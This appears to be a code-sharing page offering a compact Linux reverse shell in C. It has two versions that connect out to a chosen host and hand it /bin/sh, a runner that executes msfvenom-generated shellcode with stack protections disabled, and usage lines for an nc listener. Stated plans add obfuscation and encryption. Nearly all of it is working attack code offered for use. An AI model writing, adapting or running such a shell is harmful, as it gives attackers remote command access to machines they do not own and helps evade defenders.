A compact linux reverse shell written in the C Programming Language.

compact_linux_reverse_shell.c

/*
NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on)
NOTE don't assume or think this is the latest because it's on first on top on the list; it's not.
Version 1 'naive approach' (hard coded values, etc)
gcc -g -o L1 lin_1.c
*/
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234
#define RH "127.0.0.1"
#define BIN "/bin/sh"
int main(){
int is = 0;is = socket(AF_INET,SOCK_STREAM,0);
struct  sockaddr_in s1;
s1.sin_family      = AF_INET;
s1.sin_port        = htons(RP);
s1.sin_addr.s_addr = inet_addr(RH);
connect( is,(struct sockaddr *) &s1,sizeof(s1));
for(int i=0;i<3;dup2(is,i),i++);
char * const argv[] = {BIN,NULL};
execve(BIN, argv, NULL);
return 0;}

shellcode_addon.c

/*
 some opts not abs. nec. but including for future ref. keeping.
 gcc lin_1.c -o L1 -fno-stack-protector -z execstack -no-pie  -g
  msfvenom -p linux/x64/exec cmd="echo ABC \&\& echo XYZ" -f c -v sh_1
  [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
  [-] No arch selected, selecting arch: x64 from the payload
  No encoder specified, outputting raw payload
  Payload size: 57 bytes
  Final size of c file: 265 bytes
  unsigned char sh_1[] = 
  "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52"
  "\x66\x68\x2d\x63\x54\x5e\x52\xe8\x15\x00\x00\x00\x65\x63\x68"
  "\x6f\x20\x41\x42\x43\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x58"
  "\x59\x5a\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05";
*/
#include <stdio.h>
#include <unistd.h>
int main(){
  unsigned char sh_1[] = 
  "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52"
  "\x66\x68\x2d\x63\x54\x5e\x52\xe8\x15\x00\x00\x00\x65\x63\x68"
  "\x6f\x20\x41\x42\x43\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x58"
  "\x59\x5a\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05";
// (*(void(*)())XXX)();
(*(void(*)())sh_1)();
return 0;
}

shellcode_addon_2.c

coming soon own encoder

TODO:

• diff-ways-to input :
  - [ ] ip,port,executable, and more
• function, shellcode,
  -[] other loops to obfuscate

Version 2 'Better'

// Version 2 - better but still not "as good as I want it. Namely, there are some (very obvious) flaws in this program.
// No error handling, for example. And no "verbose/debug" output.
// The BIN can't include any arguments (like, BIN="echo hello" won't work.)
/*
 * ===== usage =====
 * 
 * -----set up listener-----
 * clear; nc -nvlp 1234
 * #----------compile---------- ----------set env vars--------------------      -------run it-------
 * clear; rm R;gcc -o R rsh.c && RP="1234" && RH="127.0.0.1" && BIN="/bin/sh"  && ./R $RP $RH $BIN
 * 
 */

#include <stdarg.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char **argv) {
int RP = 0; RP = atoi(argv[1]);
char *RH  = argv[2];
char *BIN = argv[3];
int is = 0; is = socket(AF_INET,SOCK_STREAM,0);
struct  sockaddr_in s1;
s1.sin_family      = AF_INET;
s1.sin_port        = htons(RP);
s1.sin_addr.s_addr = inet_addr(RH);
connect( is,(struct sockaddr *) &s1,sizeof(s1));
for(int i=0;i<3;dup2(is,i),i++);
char * const A[] = {BIN,NULL};
execve(BIN,  A, NULL);
return 0;
}

Version 2 screenshot

UPCOMING 2 UPDATES

1

• Make both reverse shells (windows and linux) act as both a server and a client. How? 2 functions.
  • client(remote_port, remote_host, remote_binary)
  • server(listen_port)

2

• Add Cryptography/Steganography/Obfuscation to both of them. Namely:
  • The tools Here - at embeddedsw.net (libObfuscate)